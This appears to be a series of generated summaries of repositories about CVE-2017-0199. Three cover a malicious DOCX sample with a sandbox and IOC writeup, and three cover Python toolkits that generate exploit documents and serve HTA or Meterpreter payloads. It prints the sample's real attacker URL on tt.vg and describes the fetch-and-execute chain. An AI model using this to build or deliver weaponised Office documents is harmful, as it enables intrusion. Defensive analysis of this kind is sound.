Microsoft Office/WordPad Remote Code Execution Vulnerability

Repository contains a single malicious Microsoft Word DOCX sample (OpenXML structure) and a blue-team writeup. The exploit targets CVE-2017-0199 (Office/Word remote code execution via external template/HTA retrieval). The key exploit primitive is in word/_rels/settings.xml.rels: an attachedTemplate relationship with TargetMode="External" pointing to tt.vg at path /BVhaS (formatted as http://<username>@tt.vg/BVhaS). When opened, Word (WINWORD.EXE) attempts HTTP/HTTPS requests (GET/HEAD /BVhaS, OPTIONS /) to tt.vg; the README reports 404 responses in the sandbox run, implying the second-stage payload was unavailable at detonation time. Structure/purpose: - README.md: detailed sandbox detonation report (ANY.RUN) including attack chain narrative, network IOCs (tt.vg, /BVhaS, resolved IPs), and forensic artifacts (temp files, Content.MSO EMF cache) plus registry access notes and hunting query examples. - OpenXML parts: [Content_Types].xml, docProps/*, word/document.xml, word/settings.xml, and relationship files. The relationships show embedded OLE objects (AcroExch.Document.DC) and the external attachedTemplate pointer that drives the CVE-2017-0199 behavior. Overall, this is not a traditional exploit codebase but a weaponized document sample plus analysis. It provides a reproducible indicator set (domain/URL/IPs and artifact locations) and demonstrates how the DOCX is wired to trigger outbound retrieval that can lead to RCE on vulnerable Office installations.

Repository contains a malicious Microsoft Word DOCX sample (OpenXML structure) and a blue-team oriented writeup. The exploit targets CVE-2017-0199 (Office/Word remote code execution via external template/HTA retrieval). Structure/purpose: - README.md: Detailed ANY.RUN sandbox detonation report, attack chain narrative, and IOCs (domain tt.vg, URLs /BVhaS, resolved IPs). Describes Word making GET/HEAD requests and dropping temp/cache artifacts; includes example hunting query. - OpenXML parts (e.g., word/document.xml, word/settings.xml, relationships): The actual weaponized document internals. Key exploit mechanism (in-document): - word/_rels/settings.xml.rels defines an External attachedTemplate relationship: Target="http://ballontechnologytoupdatethenewthingstodeliveredeverywhere@tt.vg/BVhaS" with TargetMode="External". This is the critical indicator of the CVE-2017-0199-style behavior: when the document is opened, Word attempts to fetch remote content from tt.vg. Additional embedded content: - word/document.xml references multiple embedded OLE objects with ProgID "AcroExch.Document.DC" (PDF/Acrobat OLE embeddings). These appear to be decoy/embedded objects; the primary exploit trigger is the external template relationship. Observed capability/outcome: - Network beaconing to tt.vg over HTTP/HTTPS attempting to retrieve /BVhaS. The README indicates the server returned HTTP 404 in the detonation, so no second-stage payload was obtained in that run; nonetheless, the document is constructed to pull attacker-controlled remote content, which is the core exploitation capability.

This repository contains a real-world malicious DOCX file ('BankPaymAdviceVend.Report.docx') that exploits CVE-2017-0199, a remote code execution vulnerability in Microsoft Word (versions 2007–2016). The exploit is triggered when a user opens the document, causing Word to fetch and attempt to execute a remote HTA payload from the attacker-controlled domain 'tt.vg' (e.g., http://tt.vg/BVhaS). The repository provides a comprehensive blue-team analysis, including network indicators (domain, URLs, IPs), dropped files (such as EMF images in the browser cache and .tmp files), and registry keys accessed during exploitation. The structure consists of the malicious DOCX and its internal Office XML components, with the main exploit vector being an external template reference in 'word/_rels/settings.xml.rels' pointing to the attacker's server. The README.md offers detailed behavioral analysis, IOCs, and detection guidance, making this repository valuable for defenders seeking to understand and detect this exploit in enterprise environments.

This repository contains a Python 2 script (htattack.py) that implements an exploit for CVE-2017-0199, a remote code execution vulnerability in Microsoft Office's handling of RTF documents. The script acts as a malicious HTTP server that serves a payload (such as a Meterpreter shell) to victims who open a specially crafted RTF file. When the victim's Office application requests the payload, the server responds with either the executable or an HTML Application (HTA) script that uses PowerShell to download and execute the payload on the victim's Windows system. The repository includes a README with usage instructions and a reference to a demonstration video. The main exploit logic is contained in htattack.py, which handles incoming HTTP requests and serves the appropriate malicious content. The exploit requires the attacker to host the payload and run the script, and the victim must open a malicious RTF document that triggers the exploit. The attack vector is network-based, leveraging HTTP to deliver the payload. Several fingerprintable endpoints are present, including the attacker's payload URL, local file paths on both the attacker's and victim's systems, and the use of PowerShell for execution.

This repository provides a Python-based exploit toolkit for CVE-2017-0199, a remote code execution vulnerability in Microsoft Office. The main script, 'cve-2017-0199_toolkit.py', allows users to generate malicious RTF or PPSX files that, when opened by a vulnerable Office installation, will fetch and execute attacker-specified payloads. The toolkit supports both local and remote payload delivery, including EXE files (such as Meterpreter shells), HTA/SCT scripts, or custom files. The script can also serve payloads over HTTP, acting as a simple web server. The README provides detailed usage scenarios and command-line options, demonstrating how to generate malicious documents and deliver payloads. The exploit is operational and can be used to achieve remote code execution on unpatched Microsoft Office installations. The repository contains three files: a detailed README, a TODO list, and the main exploit script written in Python.

This repository contains a Python 3 script ('cve-2017-0199_toolkit_3.py') that implements an exploit for CVE-2017-0199, a remote code execution vulnerability in Microsoft Office. The toolkit can generate malicious RTF or PPSX files that, when opened by a vulnerable Office installation, cause the application to fetch and execute a remote payload (such as a Meterpreter shell or custom executable) via a crafted HTA or SCT file. The script supports two main modes: 'gen' (generation of malicious files) and 'exp' (exploitation/delivery of payloads). It allows the attacker to specify URLs or local paths for payloads and HTA/SCT files, and can obfuscate the generated RTF files. The exploit works by running a local HTTP server to deliver the malicious content and payloads to the victim. The README provides a brief overview and notes that the script has been updated for Python 3 compatibility. The repository is operational and suitable for penetration testing or red teaming against unpatched Microsoft Office installations.